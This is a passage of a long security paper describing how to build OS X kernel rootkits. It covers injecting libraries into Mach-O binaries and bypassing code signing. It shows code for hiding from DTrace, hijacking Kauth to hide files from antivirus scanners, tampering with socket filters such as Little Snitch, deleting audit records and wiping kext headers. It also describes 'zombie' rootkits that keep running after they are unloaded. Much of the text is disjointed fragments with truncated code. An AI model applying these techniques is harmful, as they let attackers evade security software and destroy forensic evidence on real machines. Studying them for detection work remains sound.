|  .-------------.  |     |  .-------------.  |    uint32_t ncmds;     <- fix
|  |  Command 1  |  |     |  |  Command 1  |  |    uint32_t sizeofcmds;<- fix
|  |-------------|  |     |  |-------------|  |    ...
|  |  Command 2  |  |     |  |  Command 2  |  |   };
|  |-------------|  |     |  |-------------|  |
|  |     ...     |  |     |  |     ...     |  |
|  |-------------|  |     |  |-------------|  |
|  |  Command n  |  |     |  |  Command n  |  |
|  `-------------'  |     |  |-------------|  |
|                   |---->|  | Command n+1 |  |<- add new command here
|                   |---->|  `-------------'  |   struct dylib_command {
|-------------------|---->|-------------------|    uint32_t cmd;
|       Data        |---->|       Data        |    uint32_t cmdsize;
| .---------------. |---->| .---------------. |    struct dylib dylib;
| |   | Section 1 | |---->| |   | Section 1 | |   };
| | 1 |-----------| |     | | 1 |-----------| |
| |   | Section 2 | |     | |   | Section 2 | |
| `---------------' |     | `---------------' |
| .---------------. |     | .---------------. |
| |   | Section 1 | |     | |   | Section 1 | |
| | 2 |-----------| |     | | 2 |-----------| |
| |   | Section 2 | |     | |   | Section 2 | |
| `---------------' |     | `---------------' |
|        ...        |     |        ...        |
`-------------------'     `-------------------'
There are other methods to inject the library if there is not enough
space. One that requires only 24 bytes is described at [16].
    /*
     * Set code-signing flags if this binary is signed, or if parent has
     * requested them on exec.
     */
    if (load_result.csflags & CS_VALID) {
        imgp->ip_csflags |= load_result.csflags &
            (CS_VALID|
             CS_HARD|CS_KILL|CS_EXEC_SET_HARD|CS_EXEC_SET_KILL);
    } else {
        imgp->ip_csflags &= ~CS_VALID;
    }
The code snippet is from exec_mach_imgact() and is located well before our
two candidate functions described in section 4.3. Code signing does not
kill the process immediately. The flags are verified later and a kill
signal is sent if code signing was configured to exit on failure (which we
can also modify here).
The only puzzle piece left is which process to use and how to kill
it. There are many root processes controlled by launchd so it is just
a matter of selecting one with invisible and/or small impact. Spotlight
is for example a good candidate. A code snippet to do the killing:
The dynamic library is very easy to create if you use the Xcode template
(oh the drama, hackers use Makefiles!) or just Google for a simple
Makefile.
To execute the library code you can add an entrypoint via a constructor:
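A minimal sketch of such an entrypoint, assuming a compiler that supports
the GCC/Clang constructor attribute. The names payload_init,
payload_has_started and g_payload_started are hypothetical and not taken
from the sample code:

```c
/* Hypothetical flag so the rest of the library can tell init has run. */
static int g_payload_started = 0;

/*
 * Functions marked as constructors are run by the dynamic linker when
 * the image is loaded, before the host program's main() is reached.
 */
__attribute__((constructor))
static void payload_init(void)
{
    g_payload_started = 1;
    /* whatever the library is supposed to do would be started here */
}

/* Accessor, only present to make the sketch easy to check. */
int payload_has_started(void)
{
    return g_payload_started;
}
```

Nothing has to call payload_init() explicitly, which is the whole point:
loading the library is enough to get code execution.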
The first one is that we need to restart a target process. This will
leave an immediate clue in the form of a (potentially much) higher PID,
depending on when the method is used (near startup it is ok).
What we can do is search the binary for calls to the symbol stub
(each one is a relative offset call). Even easier (and probably faster)
is to disassemble and match the address of the call with the stub -
the disassembler will output the final address.
After we have the address from which dispatch_flush_continuation_cache()
is called, we just need to find the function prologue and patch it with
a ret (the function returns void so there is no need for xor eax,eax).
We can then restore the original byte after we execute our command.
Another function, bsd_out_message(), might need to be patched, but I
leave that task to you, the reader.
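The patch-and-restore step can be sketched on a plain byte buffer. This is
only an illustration of the idea: the helper names are hypothetical, and
in a real target the bytes live in another address space and must be
made writable first, which is not shown here.

```c
#include <stdint.h>

#define X86_RET 0xC3  /* opcode of a near "ret" */

/*
 * Overwrite the first prologue byte with ret so the function returns
 * immediately, and hand back the original byte for later restoration.
 */
uint8_t patch_with_ret(uint8_t *prologue)
{
    uint8_t saved = prologue[0];
    prologue[0] = X86_RET;
    return saved;
}

/* Put the original byte back once our command has been executed. */
void restore_prologue(uint8_t *prologue, uint8_t saved)
{
    prologue[0] = saved;
}
```

Only one byte changes, so the window in which the patch is visible can be
kept very short.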
Another alternative is to try to recycle the PID that was killed. The
forkproc() function is the one that allocates the new PID for the
child. It might be interesting to research and explore this alternative.
You might also want to reorder the proc list and move the new element to
its original location instead of leaving it in the newer one. There are
many possibilities to hide, and to try to detect, the rootkit actions.
That is why it is fun!
The next issue is that process memory will contain our injected library so
we want to remove it as soon as possible. I did some interesting work
in this area but an NDA applies and I can't disclose it. It can be done
and you should think about it, or just use a brute approach and kill the
process again and this time do not inject anything. Whatever works :-)
The most interesting entrypoints for our purposes are open, close,
ioctl. If you are interested in using this communication channel, you
probably should think about encrypting it or some kind of authentication
method. OS.X/Crisis has no authentication whatsoever so anyone can send
commands to the kernel rootkit after (easily) finding all the possible
ioctl commands.
A kernel extension is responsible for creating the socket and the userland
part will read and send data to that same socket (socket access can be
restricted to privileged users or everyone).
Another important detail is the control ID. Since the recommended
way is to use a dynamically assigned control ID, the userland client
needs somehow to retrieve it. This can be done using an ioctl request
(the reverse DNS name must be shared between the kernel and userland).
The two presented solutions are easy to set up and use but also easy
to detect. Their main problem is that they leave "permanent" traces
that need to be hidden (kernel structures for example). This increases
the rootkit's complexity and its chances of being detected.
Covert channels are a lot more appropriate and a lot has been written
about them. Since it is so easy to use almost any kernel function, the
possibilities to be creative in this department are much higher. Data can
be stealthily read and written anywhere in the filesystem, bypassing many
detection and instrumentation mechanisms, as will be shown next. Taken to
the limit, there is no real need for a direct communication channel! For
example, data can be encoded in a binary and intercepted when it is
executed. The possibilities are really endless. This very short section
is just a reminder that rootkit design can be different from what is
usually done and that you should think about it, whether you belong to
the offensive or defensive side.
--[ 6 - Anti-forensics
Kernel extensions must have a start and stop function. Their prototype
specifies a kmod_info_t structure as first parameter. It is part of a
linked list of all loaded kernel extensions (used to hide the rootkit
from kextstat but now marked deprecated) and contains a very useful
field to apply this cheap trick.
The "address" field contains the starting address of the currently loaded
kext, including the ASLR slide (kernel and kernel extensions Mach-O header
values include the current kernel ASLR slide). With this information we
just need to find out the total size of the header and nuke it:
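A minimal sketch of that computation, written so it can be tried on an
ordinary buffer. The struct mirrors the field layout of mach_header_64
from <mach-o/loader.h>; the names mh64, macho_header_span and
wipe_macho_header are hypothetical. In the kernel the base pointer would
come from the "address" field, and the header pages would first have to
be made writable, which is not shown.

```c
#include <stddef.h>
#include <stdint.h>
#include <string.h>

/* Same field order and sizes as struct mach_header_64. */
struct mh64 {
    uint32_t magic;
    int32_t  cputype;
    int32_t  cpusubtype;
    uint32_t filetype;
    uint32_t ncmds;
    uint32_t sizeofcmds;
    uint32_t flags;
    uint32_t reserved;
};

#define MH64_MAGIC 0xfeedfacfu  /* MH_MAGIC_64 */

/* Header plus all load commands; 0 if base is not a 64-bit Mach-O. */
size_t macho_header_span(const void *base)
{
    struct mh64 mh;
    memcpy(&mh, base, sizeof(mh));
    if (mh.magic != MH64_MAGIC)
        return 0;
    return sizeof(mh) + mh.sizeofcmds;
}

/* Zero the header and load commands; returns the number of bytes wiped. */
size_t wipe_macho_header(void *base)
{
    size_t span = macho_header_span(base);
    if (span != 0)
        memset(base, 0, span);
    return span;
}
```

The size has to be read before the wipe, since sizeofcmds is itself part
of what gets destroyed.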
Function pointers can help to hide our code - the question is how easy or
not it is to bootstrap the rootkit to search the required symbols. One
solution can be to use the techniques described before to find the
symbols and then mangle the bootstrap code - only leave in memory code
using function pointers. Be creative, try to reduce your footprint to
the maximum :-).
A 32-bit integer is used for the debug messages, with the following
format:
 ----------------------------------------------------------------------
|              |               |                              |Func   |
| Class (8)    | SubClass (8)  |          Code (14)           |Qual(2)|
 ----------------------------------------------------------------------
Macros exist to encode the integer for each available class. Using BSD
class as an example:
Grep'ing XNU source code for BSDDBG_CODE will show where kdebug is
implemented in all BSD related functions. The fs_usage util traces
the file system related system calls (its source is located in
system_cmds-550.10 package). For example, it contains the following
code for open() syscall:
#define DBG_BSD 4
#define DBG_BSD_EXCP_SC 0x0C /* System Calls */
Open is syscall #5 and it matches the code: (0x040C0014 >> 2) & 0x3FFF
= 0x5
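The bit layout can be checked with a few helpers. This is a sketch that
follows the class/subclass/code/qualifier layout described above; the
kd_* function names are hypothetical and are not the kernel's macros.

```c
#include <stdint.h>

/* Layout: class (8) | subclass (8) | code (14) | func qualifier (2) */
uint32_t kd_encode(uint32_t cls, uint32_t subcls, uint32_t code)
{
    return ((cls & 0xffu) << 24) |
           ((subcls & 0xffu) << 16) |
           ((code & 0x3fffu) << 2);
}

uint32_t kd_class(uint32_t id)    { return (id >> 24) & 0xffu; }
uint32_t kd_subclass(uint32_t id) { return (id >> 16) & 0xffu; }
uint32_t kd_code(uint32_t id)     { return (id >> 2) & 0x3fffu; }
uint32_t kd_func(uint32_t id)     { return id & 0x3u; }
```

With class 4 (DBG_BSD), subclass 0x0C (DBG_BSD_EXCP_SC) and code 5,
kd_encode() produces 0x040C0014, and kd_code() on that value gives back
the syscall number.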
(...)
KERNEL_DEBUG_CONSTANT_IST(KDEBUG_TRACE,
BSDDBG_CODE(DBG_BSD_EXCP_SC, code) | DBG_FUNC_START,
(int)(*ip), (int)(*(ip+1)), (int)(*(ip+2)),
(int)(*(ip+3)), 0);
(...)
error = (*(callp->sy_call))((void *) p, uargp, &(uthread->uu_rval[0]));
(...)
KERNEL_DEBUG_CONSTANT_IST(KDEBUG_TRACE,
BSDDBG_CODE(DBG_BSD_EXCP_SC, code) | DBG_FUNC_END,
error, uthread->uu_rval[0], uthread->uu_rval[1], p->p_pid, 0);
(...)
void
tfc_kernel_debug(uint32_t debugid, uintptr_t arg1, uintptr_t arg2,
uintptr_t arg3, uintptr_t arg4, __unused uintptr_t arg5)
{
// solve the symbol of the original function
static void (*_kernel_debug)(uint32_t debugid, uintptr_t arg1,
uintptr_t arg2, uintptr_t arg3, uintptr_t arg4,
__unused uintptr_t arg5) = NULL;
if (_kernel_debug == NULL)
_kernel_debug = (void*)solve_kernel_symbol(&g_kernel_info,
"_kernel_debug");
This patch will be suspicious when fs_usage and/or sc_usage are used
because no BSD system calls will be traced and screen output will be very
sparse. kdebug's implementation makes it hard to distinguish between
the cases to hide and those to leave alone. Its buffers are very small and
this is easily noticed if you peek at fs_usage or sc_usage code (check the
lookup() [bsd/vfs/vfs_lookup.c] kernel function to see how fs_usage gets
the path name for syscalls such as open()).
Using an example with the open syscall (to be used later in the Kauth
section):
The vnode check handler that we can install has the following prototype:
Our handler will receive a pointer to the vnode structure, which makes
it possible to dump the filename and even traverse the full path
(remember that vnodes exist in a linked list).
To attack this we can use the same old story: hook those functions,
or attack the mac_policy_list using the syscall handler concept, or
something else. When loading the rootkit it might also be useful to
look up the policy list to verify if there is anything else installed
other than the default modules. The system owner might be a bit smarter
than the vast majority ;-).
Let's move to what really matters for us, evil stuff! Auditing is
implemented with macros [bsd/security/audit/audit.h] inside BSD and
Mach system calls (and some other places). The following code snippet
is from the unix_syscall64 implementation, where the entry and exit
macros are placed around the call to the syscall function:
AUDIT_SYSCALL_ENTER(code, p, uthread);
error = (*(callp->sy_call))((void *) p, uargp, &(uthread->uu_rval[0]));
AUDIT_SYSCALL_EXIT(code, p, uthread, error);
/*
* audit_syscall_enter() is called on entry to each system call. It is
* responsible for deciding whether or not to audit the call
* (preselection), and if so, allocating a per-thread audit record.
* audit_new() will fill in basic thread/credential properties.
*/
/*
* audit_syscall_exit() is called from the return of every system call, or
* in the event of exit1(), during the execution of exit1(). It is
* responsible for committing the audit record, if any, along with return
* condition.
*/
When committed, the audit record will be added to an audit queue and
removed from the user thread structure (struct uthread, field uu_ar
[bsd/sys/user.h]).
void
audit_syscall_exit(unsigned int code, int error, __unused proc_t proc,
struct uthread *uthread) {
(...)
audit_commit(uthread->uu_ar, error, retval);
out:
uthread->uu_ar = NULL;
}
- audit_syscall_exit
- audit_mach_syscall_exit
- audit_proc_coredump
- audit_session_event
This will call the function responsible to set the audit record field:
With this information we just need to hold the queue commit to disk until
enough information to find the correct session ID is available. When we
have it we can edit the queue and remove all the entries that match that
session ID.
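The queue editing can be sketched with the usual <sys/queue.h> tail queue
macros. The record type here is a stripped-down, hypothetical stand-in
(audit_rec, session_id and link are invented for the illustration), and
inside the kernel the queue lock would have to be held while doing this:

```c
#include <stdlib.h>
#include <sys/queue.h>

/* Hypothetical, minimal audit record: just a session ID and the link. */
struct audit_rec {
    unsigned int session_id;
    TAILQ_ENTRY(audit_rec) link;
};
TAILQ_HEAD(audit_queue, audit_rec);

/* Unlink and free every record of the given session; returns the count. */
int drop_session_records(struct audit_queue *q, unsigned int sid)
{
    int dropped = 0;
    struct audit_rec *rec = TAILQ_FIRST(q);

    while (rec != NULL) {
        /* fetch the successor first, rec may be freed below */
        struct audit_rec *next = TAILQ_NEXT(rec, link);
        if (rec->session_id == sid) {
            TAILQ_REMOVE(q, rec, link);
            free(rec);
            dropped++;
        }
        rec = next;
    }
    return dropped;
}
```

Records from other sessions are left in place and in their original
order, so the remaining log still looks continuous.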
Last but not least, there is a critical task left! Auditing logs must be
cleaned in case auditing was already properly configured. The bad news
is that you will have to do this dirty work yourself. Do not forget that
the logs are in binary format and OpenBSM's source at [29] can be helpful
(praudit outputs XML format so it might be a good starting point).
This provider allows tracing of every BSD system call entry and return (the
provider for Mach traps is mach_trap). A quick example that prints the path
argument being passed to the open() syscall:
# dtrace -n 'syscall::open:entry
{
printf("opening %s", copyinstr(arg0));
}'
dtrace: description 'syscall::open:entry' matched 1 probe
CPU ID FUNCTION:NAME
0 119 open:entry opening /dev/dtracehelper
0 119 open:entry opening
/usr/share/terminfo/78/xterm-256color
0 119 open:entry opening /dev/tty
0 119 open:entry opening /etc/pf.conf
(...)
lck_mtx_lock(&dtrace_systrace_lock);
if (sysent[sysnum].sy_callc == systrace_sysent[sysnum].stsy_underlying)
{
vm_offset_t dss = (vm_offset_t)&dtrace_systrace_syscall;
ml_nofault_copy((vm_offset_t)&dss,
(vm_offset_t)&sysent[sysnum].sy_callc, sizeof(vm_offset_t));
}
lck_mtx_unlock(&dtrace_systrace_lock);
(...)
Before:
What are the conclusions from all this? If only the sysent table function
pointers are modified by the rootkit, DTrace will be unable to directly
detect the rootkit using the syscall provider. DTrace will copy the
modified pointer and return to it as if it were the original. DTrace is
blind to the original function because it does not exist anymore in the
table, only inside our modified version.
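A toy userland model of this behaviour, not the XNU code: a single table
slot is hooked first and the provider is enabled afterwards. All names
(model_enable_probe, systrace_stub, g_underlying and the two open
stand-ins) are hypothetical.

```c
typedef int (*sy_call_t)(void);

static int real_open(void)   { return 1; }  /* stands in for the original */
static int hooked_open(void) { return 2; }  /* stands in for the rootkit  */

static sy_call_t g_underlying;              /* plays the saved pointer    */

/* What the table points to while the probe is enabled. */
static int systrace_stub(void)
{
    /* the probe would fire here, then the saved pointer is called */
    return g_underlying();
}

/* Model of enabling the probe on one slot of the table. */
void model_enable_probe(sy_call_t *slot)
{
    g_underlying = *slot;   /* whatever is in the table right now */
    *slot = systrace_stub;
}

/* Hook first, enable tracing second, then make the "syscall". */
int model_demo(void)
{
    sy_call_t slot = real_open;

    slot = hooked_open;          /* rootkit patches the table */
    model_enable_probe(&slot);   /* tracing is enabled afterwards */
    return slot();               /* ends up in hooked_open() */
}
```

In this model the tracer only ever sees and calls the hooked pointer;
real_open() is reachable solely from inside the hook.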
fbt stands for function boundary tracing and allows tracing function entry
and exit of almost all kernel related functions (there is a small list of
untraceable functions called critical_blacklist [bsd/dev/i386/fbt_x86.c]).
The possibilities to detect malicious code using this provider are higher
due to its design and implementation. An example using the rubilyn rootkit
is the best way to demonstrate this:
0 99661 unix_syscall64:entry
0 97082 kauth_cred_uthread_update:entry
0 2119 new_getdirentries64:entry <- hooked syscall!!!
0 91985 getdirentries64:entry <- original function
0 92677 vfs_context_current:entry
A very simple trace is able to detect both the hooked syscall and the
call to original getdirentries64. Houston, we have a rootkit problem!
"On x86, FBT uses a trap-based mechanism that replaces one of the
instructions in the sequence that establishes a stack frame (or one of
the instructions in the sequence that dismantles a stack frame) with an
instruction to transfer control to the interrupt descriptor table (IDT).
The IDT handler uses the trapping instruction pointer to look up the FBT
probe and transfers control into DTrace. Upon return from DTrace, the
replaced instruction is emulated from the trap handler by manipulating
the trap stack."
After:
# dtrace -n fbt::getdirentries64:entry
The function that does all the work to find the patch location is
__provide_probe_64() [bsd/dev/i386/fbt_x86.c] (FBT_PATCHVAL defines the
illegal opcode byte).
    if (fbt->fbtp_currentval != fbt->fbtp_patchval)
    {
        (void)ml_nofault_copy((vm_offset_t)&fbt->fbtp_patchval,
            (vm_offset_t)fbt->fbtp_patchpoint, sizeof(fbt->fbtp_patchval));
        fbt->fbtp_currentval = fbt->fbtp_patchval;
        ctl->mod_nenabled++;
    }
The following diagram shows the trap handling of the illegal instruction:
It is not possible to just patch this call because the emul value
determines the type of emulation that needs to be executed after.
dtrace_invop is used by fbt and sdt providers and does nothing more than
calling function pointers contained in dtrace_invop_hdlr linked list
[bsd/dev/dtrace/dtrace_subr.c].
if (fbt->fbtp_roffset == 0) {
x86_saved_state64_t *regs = (x86_saved_state64_t *)state;
CPU->cpu_dtrace_caller = *(uintptr_t
*)(((uintptr_t)(regs->isf.rsp))+sizeof(uint64_t)); // 8(%rsp)
/* 64-bit ABI, arguments passed in registers. */
dtrace_probe(fbt->fbtp_id, regs->rdi, regs->rsi, regs->rdx,
regs->rcx, regs->r8); // <---------- call to dtrace functionality --------
CPU->cpu_dtrace_caller = 0;
} else {
dtrace_probe(fbt->fbtp_id, fbt->fbtp_roffset, rval, 0, 0,
0);
CPU->cpu_dtrace_caller = 0;
}
return (fbt->fbtp_rval); <- the emul value
}
}
return (0);
}
kern_return_t
fbt_perfCallback_hooked(int trapno, x86_saved_state_t *tagged_regs,
uintptr_t *lo_spp, __unused int unused2)
{
kern_return_t retval = KERN_FAILURE;
x86_saved_state64_t *saved_state = saved_state64(tagged_regs);
Functions that we want to hide from DTrace will never reach its
probe system, effectively hiding them. The performance impact should
be extremely low unless there are too many functions to hide, and
hide_from_fbt() takes too long to execute.
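The lookup itself can be as simple as a linear scan over the patch points
we want to keep invisible. The sketch below is only an assumption about
what such a check could look like; the function name is_hidden_from_fbt,
the table and the addresses in it are made up for the illustration.

```c
#include <stddef.h>
#include <stdint.h>

/* Hypothetical table of patch points that must stay invisible. */
static const uint64_t g_hidden_points[] = {
    0xffffff8000001000ULL,
    0xffffff8000002000ULL,
};

/* Returns 1 when the trapping address belongs to a hidden function. */
int is_hidden_from_fbt(uint64_t trap_addr)
{
    size_t n = sizeof(g_hidden_points) / sizeof(g_hidden_points[0]);

    for (size_t i = 0; i < n; i++) {
        if (g_hidden_points[i] == trap_addr)
            return 1;
    }
    return 0;
}
```

With a handful of entries the scan costs next to nothing on each trap; a
long list would probably justify a sorted table or a hash instead.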
This time let me show you how to attack Kauth. The example will be based
on the KAUTH_FILEOP_OPEN action and open() syscall. To avoid unnecessary
browsing of XNU sources, this is the workflow up to the interesting point:
I do not want to spam you with code but allow me to reprint the fileop
function:
int
kauth_authorize_fileop(kauth_cred_t credential, kauth_action_t action,
uintptr_t arg0, uintptr_t arg1)
{
char *namep = NULL;
int name_len;
uintptr_t arg2 = 0;
if (namep != NULL) {
release_pathbuff(namep);
}
return(0);
}
It is clear now that this is a great place to hijack and hide files
we do not want the AV to scan (or some other listener - this is also a
good feature for a file monitor). We just need to verify if the current
file matches our list and return 0 if it does, else call the original code
(none of these functions are static so we can easily find the symbols).
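A simplified userland model of that check. The credential argument is
dropped, arg1 is treated as the path (as it is for KAUTH_FILEOP_OPEN),
and the original function is replaced by a counter so the effect can be
observed. Every name and the hidden path are hypothetical.

```c
#include <stddef.h>
#include <stdint.h>
#include <string.h>

typedef int (*fileop_fn)(int action, uintptr_t arg0, uintptr_t arg1);

static fileop_fn g_orig_fileop;      /* set when the hook is installed */
static int g_listener_calls;         /* how often listeners would run  */

/* Hypothetical list of paths that listeners must never see. */
static const char *g_hidden_paths[] = { "/tmp/hidden.bin", NULL };

/* Stand-in for the original function: it would notify the listeners. */
static int orig_fileop_model(int action, uintptr_t arg0, uintptr_t arg1)
{
    (void)action; (void)arg0; (void)arg1;
    g_listener_calls++;
    return 0;
}

static int path_is_hidden(const char *path)
{
    for (size_t i = 0; g_hidden_paths[i] != NULL; i++) {
        if (strcmp(path, g_hidden_paths[i]) == 0)
            return 1;
    }
    return 0;
}

/* Hidden files return 0 right away, everything else goes to the original. */
int hooked_fileop(int action, uintptr_t arg0, uintptr_t arg1)
{
    const char *path = (const char *)arg1;

    if (path != NULL && path_is_hidden(path))
        return 0;
    return g_orig_fileop(action, arg0, arg1);
}

void install_fileop_hook(void) { g_orig_fileop = orig_fileop_model; }
int  listener_calls(void)      { return g_listener_calls; }
```

Both paths return 0 to the caller; the only difference is whether the
listeners are ever told about the file.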
struct sflt_filter {
sflt_handle sf_handle;
int sf_flags;
char *sf_name;
sf_unregistered_func sf_unregistered;
sf_attach_func sf_attach; // handles attaches to sockets.
sf_detach_func sf_detach;
sf_notify_func sf_notify;
sf_getpeername_func sf_getpeername;
sf_getsockname_func sf_getsockname;
sf_data_in_func sf_data_in; // handles incoming data.
sf_data_out_func sf_data_out;
sf_connect_in_func sf_connect_in; // handles inbound connections.
sf_connect_out_func sf_connect_out;
sf_bind_func sf_bind; // handles binds.
(...)
}
History repeats itself and once again the easiest way is to hook
the function pointers and do whatever we want. The Little Snitch driver
(it's an I/O Kit driver and not a kernel extension) loads very early so
hooking sflt_register() and modifying the structure on the fly is not
very interesting. We need to look up the structure in kernel memory and
modify it.
Many different socket filters can be attached to the same socket so there
must be a data structure holding this information. The interesting source
file is bsd/kern/kpi_socketfilter.c, where a tail queue is created and
referenced using a static variable sock_filter_head.
struct socket_filter {
TAILQ_ENTRY(socket_filter) sf_protosw_next;
TAILQ_ENTRY(socket_filter) sf_global_next;
struct socket_filter_entry *sf_entry_head;
TAILQ_HEAD(socket_filter_list, socket_filter);
static struct socket_filter_list sock_filter_head;
Iterating around the tail queue we find the Little Snitch socket filter:
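The walk itself might be sketched as follows, using a reduced model of
the queue. The struct sf_model, its fields and the filter names are
hypothetical; since sock_filter_head is static, its address has to be
located by other means before anything like this can run in the kernel.

```c
#include <string.h>
#include <sys/queue.h>

/* Reduced, hypothetical model of a registered socket filter. */
struct sf_model {
    const char *name;                   /* plays the role of sf_name */
    TAILQ_ENTRY(sf_model) global_next;  /* link in the global list   */
};
TAILQ_HEAD(sf_model_list, sf_model);

/* Return the first filter whose name contains needle, or NULL. */
struct sf_model *find_filter(struct sf_model_list *head, const char *needle)
{
    struct sf_model *f;

    TAILQ_FOREACH(f, head, global_next) {
        if (f->name != NULL && strstr(f->name, needle) != NULL)
            return f;
    }
    return NULL;
}
```

Once the entry is found, its function pointers are the interesting part,
since those are what gets called for every socket event.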
/*!
@typedef sf_attach_func
struct Cookie
{
(...)
0x48: IOLock *lock;
0x74: pid_t pid; // process that owns the socket
0x78: int32_t count;
0x7C: int32_t *xxx;
0x80: int32_t protocol;
0x85: int8_t domain;
0x86: int8_t type;
(...)
}
The idea here is to exploit kernel memory allocations and leaks. Kernel
and kernel extensions share the same memory map, kernel_map, and there
are a few kernel function "families" to allocate kernel memory:
- kalloc.
- kmem_alloc.
- OSMalloc.
- MALLOC/FREE.
- IOMalloc/IOFree for I/O Kit.
My initial (too complicated) idea was to load the rootkit, hook whatever
was needed, unload the rootkit, and then protect the memory that was
used. This was based on the fact that unloading does not destroy the
rootkit memory so everything would work as long as those blocks of memory
were not reallocated to something else. I wanted to edit the kernel
memory map and mark those pages as used.
load rootkit -> find rootkit -> calculate rootkit -> alloc zombie
                base address    size                 memory
                                                       |
                                                       v
unload original <- transfer control <- fix memory  <- copy rootkit into
rootkit            to zombie           protections    zombie memory
The control transfer to zombie code has a small caveat inherited from
the previous paragraph - the start function must return a value so we
can't simply jump into the zombie. Two ideas come to mind to solve
this problem: first, we can hook some kernel function and transfer
control to the zombie from there; second, we can use kernel threads -
create a new thread and let the main one return.
kern_return_t
kernel_thread_start(thread_continue_t continuation, void *parameter,
thread_t *new_thread);
The zombie thread start function should have a prototype like this:
To set the start function pointer we need to find that function's address
in the zombie memory. Symbol information is not available (the __LINKEDIT
segment is not loaded) and to avoid reading from the filesystem we can
use a quick trick - find the rootkit base address and compute the
difference to the address of the start function in the rootkit (since that
is in the original rootkit code). Since we have the zombie start address
returned from the memory allocation, we just need to add the difference
and we have the location of the start function inside the zombie. Having
computed the function pointer, we can now pass it to kernel_thread_start()
and be sure that zombie code will execute.
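The arithmetic is short enough to show in full. The function and
parameter names are hypothetical:

```c
#include <stdint.h>

/*
 * The copy keeps the internal layout of the original, so a function
 * sits at the same offset from the base in both places.
 */
uintptr_t zombie_entry(uintptr_t rootkit_base, uintptr_t rootkit_start_fn,
                       uintptr_t zombie_base)
{
    uintptr_t offset = rootkit_start_fn - rootkit_base;
    return zombie_base + offset;
}
```

For example, a function located 0x71c bytes into the original ends up
0x71c bytes into the zombie allocation.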
Next problem...
Copying the original rootkit into the new area invalidates the external
symbols solved when kernel extension was loaded. Kernel extension code
is position independent (PIC) so calls are made referencing the current
instruction address. If we modify the location address and maintain
the offset, then the symbol is not valid anymore and most probably will
generate a kernel panic when executed.
Example:
Rootkit loaded in memory:
gdb$ x/10i 0xffffff7f83ad671c
0xffffff7f83ad671c: 55 push rbp
0xffffff7f83ad671d: 48 89 e5 mov rbp,rsp
0xffffff7f83ad6720: 48 8d 3d d1 09 00 00 lea rdi,[rip+0x9d1]
# 0xffffff7f83ad70f8 <- string reference
0xffffff7f83ad6727: 30 c0 xor al,al
0xffffff7f83ad6729: 5d pop rbp
0xffffff7f83ad672a: e9 61 29 35 7f jmp 0xffffff8002e29090 <-
call to kernel's printf, solved when kext was loaded
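The displacement arithmetic behind this example can be sketched as
follows. The helper names are hypothetical; the instruction is the 5-byte
jmp rel32 (opcode e9) from the listing above, whose target is computed
from the address of the next instruction.

```c
#include <stdint.h>

#define JMP_REL32_LEN 5  /* e9 + 4-byte displacement */

/* Where a jmp rel32 located at insn_addr lands. */
uint64_t rel32_target(uint64_t insn_addr, int32_t disp)
{
    return insn_addr + JMP_REL32_LEN + (uint64_t)(int64_t)disp;
}

/*
 * Displacement needed to reach the same target from a new location.
 * Returns 0 on success, -1 when the target is out of rel32 range.
 */
int rel32_rebase(uint64_t new_insn_addr, uint64_t target, int32_t *out)
{
    int64_t delta = (int64_t)(target - (new_insn_addr + JMP_REL32_LEN));

    if (delta > INT32_MAX || delta < INT32_MIN)
        return -1;
    *out = (int32_t)delta;
    return 0;
}
```

For the jmp at 0xffffff7f83ad672a with displacement 0x7f352961,
rel32_target() gives 0xffffff8002e29090, the address shown by gdb. If the
copy ends up too far away for a 32-bit displacement, rel32_rebase() fails
and some other kind of jump would be needed.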
/var/log/system.log:
May 7 02:26:10 mountain-lion-64.local com.apple.kextd[12]: Failed to load
/Users/reverser/the_flying_circus.kext - (libkern/kext) kext (kmod)
start/stop routine failed.
dmesg:
Kext put.as.the-flying-circus start failed (result 0x5).
Kext put.as.the-flying-circus failed to load (0xdc008017).
Failed to load kext put.as.the-flying-circus (error 0xdc008017).
To detect when to restore the logging features, we can use a quick and
dirty hack. Loop inside the zombie thread until the kextload process is
finished. Then the original bytes can be restored and it's business as
usual but with a zombie rootkit loaded.
The foundation blocks of zombie rootkits are now exposed; the rest are
implementation details that do not matter much here and can be found in
the attached sample code.
This paper is considerably huge but still incomplete! There are a few
missing areas and you probably spotted a few problems with some of its
approaches. Let me try to describe some.
One of the main problems is the dependency on proc, task and some other
structures. These are opaque to outsiders for one good reason - they
are changed frequently between major OS X versions. For example, when I
was researching I forgot to include a define and things were not working
(luckily or not, it was not crashing the test system). Three different
proc_t (and task_t) versions must be included to create a rootkit
compatible with the three latest major OS X versions. And it is almost
certain that it will break with a new major release.
Detection and creation of tools is the next logical step. OS X lacks
these kinds of tools and here lies a good opportunity for future research
and development. The defensive side against rootkits is even more
challenging and requires additional creativity (and maybe kernel
knowledge) to develop safer and more reliable detection methods. The
challenge is issued :-).
This was a long paper and I sincerely hope it was useful in some way
to you who had the time and patience to read it. New ideas are hard to
come by and there (probably) are many here that were somehow previously
explored by others. I apologize for any missing attribution - it
is only because I do not know or I am not aware who is the original
author/source. It is particularly difficult when you read so much stuff
through the years.
And a big middle finger to Apple as a company, born from the hacking
spirit and now transformed against hacking.
--[ 9 - References
[7] Miller, Charlie & Zovi, Dino Dai, The Mac Hacker's Handbook
Wiley Publishing, 2009, ISBN: 978-0-470-39536-3
[11] fG!, Secuinside 2012, How to Start your Apple reverse engineering
adventure, http://reverse.put.as/wp-content/uploads/2012/07/Secuinside
-2012-Presentation.pdf
[20] McKusick et al, The Design and Implementation of the 4.4BSD
Operating System, Addison Wesley, 1996, ISBN: 0-201-54979-4
[21] fG!, Av-monster: the monster that loves yummy OS X anti-virus software
http://reverse.put.as/2012/02/13/av-monster-the-monster-that-loves-yum
my-os-x-anti-virus-software/
[32] Hoglund, Greg & Butler, Jamie, Rootkits: Subverting the Windows
Kernel, Addison-Wesley, 2005, ISBN-10: 0321294319
--[ EOF